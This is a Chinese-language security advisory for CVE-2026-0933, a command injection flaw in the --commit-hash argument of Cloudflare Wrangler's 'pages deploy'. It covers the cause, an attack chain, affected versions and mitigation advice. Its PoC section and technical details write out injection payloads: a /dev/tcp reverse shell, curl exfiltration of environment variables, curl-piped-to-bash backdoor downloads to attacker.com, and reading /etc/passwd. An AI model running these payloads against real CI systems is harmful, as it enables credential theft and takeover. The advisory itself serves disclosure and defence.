CVE-2026-0933 Cloudflare Wrangler pages deploy命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-0933

漏洞类型

命令注入

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cloudflare Wrangler (wrangler pages deploy)

漏洞概述

CVE-2026-0933是Cloudflare Wrangler CLI工具中的一个严重命令注入漏洞。Wrangler是Cloudflare Workers和Pages项目的官方开发工具，用于部署和管理无服务器应用。该漏洞存在于`wrangler pages deploy`命令中，由于`--commit-hash`参数未经过滤直接传递给底层shell命令，攻击者可以通过构造恶意输入执行任意系统命令。CVSS评分高达9.9（严重），表明此漏洞具有极高的危害性。虽然在常规开发环境中利用难度较高，但在CI/CD自动化流水线场景中，如果`--commit-hash`参数来自外部不可信来源，攻击者可以轻易实现命令执行，进而窃取敏感环境变量、植入后门或篡改构建产物。此漏洞影响Wrangler v2、v3和v4多个版本，需要用户尽快升级到官方发布的安全版本。

技术细节

该命令注入漏洞的根本原因在于用户输入的`--commit-hash`参数被直接拼接到shell命令字符串中。代码中使用模板字符串（Template Literals）构建git命令，如：`execSync(\`git show -s --format=%B \${commitHash}\`)`。由于`commitHash`变量未经过任何验证或转义处理，攻击者可以在参数中注入shell元字符（如`;`、`|`、`$()`、反引号等），这些字符会被shell解释执行。例如，攻击者可以构造`--commit-hash ';whoami #'`来执行额外命令，或者使用`$(curl http://attacker.com/shell.sh|bash)`从远程服务器下载并执行恶意脚本。这种shell命令注入允许攻击者完全控制目标系统的命令执行上下文，可用于读取敏感文件、窃取凭据、安装持久化后门或横向移动。由于Wrangler常在CI/CD环境中使用，攻击者一旦突破CI runner，可以获取存储在环境变量中的API密钥、访问令牌等敏感信息。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统使用wrangler pages deploy进行自动化部署，特别是在CI/CD流水线中

STEP 2

参数注入点识别

发现--commit-hash参数未被安全处理，存在命令注入漏洞

STEP 3

恶意载荷构造

构造包含shell元字符的--commit-hash参数值，如使用$()或反引号包裹恶意命令

STEP 4

触发漏洞

在CI/CD流水线执行wrangler pages deploy命令时注入恶意载荷

STEP 5

命令执行

Wrangler将恶意载荷拼接到git命令中，shell执行时触发注入的命令

STEP 6

目标达成

攻击者可在CI runner上执行任意命令，实现数据窃取、权限提升或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-0933 PoC - Wrangler pages deploy Command Injection
# Target: wrangler pages deploy --commit-hash parameter

# Example 1: Basic command execution
wrangler pages deploy ./dist --commit-hash '$(whoami)'

# Example 2: Reverse shell connection
wrangler pages deploy ./dist --commit-hash '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

# Example 3: Exfiltrate environment variables
wrangler pages deploy ./dist --commit-hash '$(curl https://attacker.com/exfil?$(env|base64))'

# Example 4: Read sensitive files
wrangler pages deploy ./dist --commit-hash '$(cat /etc/passwd)'

# Example 5: Download and execute backdoor
wrangler pages deploy ./dist --commit-hash '$(curl http://attacker.com/backdoor.sh|bash)'

# Note: This PoC demonstrates the vulnerability for authorized security testing only

影响范围

Wrangler v2 (所有版本，已EOL)

Wrangler v3 < 3.114.17

Wrangler v4 < 4.59.1

防御指南

临时缓解措施

立即将Wrangler CLI升级到v4.59.1或v3.114.17及以上版本。在升级前，CI/CD流水线中应避免将外部不可信来源的数据直接作为--commit-hash参数值传入。对于必须使用的场景，应先对输入进行严格的格式验证和白名单过滤，仅允许字母数字字符。同时建议检查CI/CD配置，移除或限制敏感环境变量（如API密钥、访问令牌）的暴露范围，并考虑使用secret management工具保护敏感凭据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0933
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0933
3 Details https://www.cvedetails.com/cve/CVE-2026-0933/
4 VulDB https://vuldb.com/cve/CVE-2026-0933
5 Link https://github.com/cloudflare/workers-sdk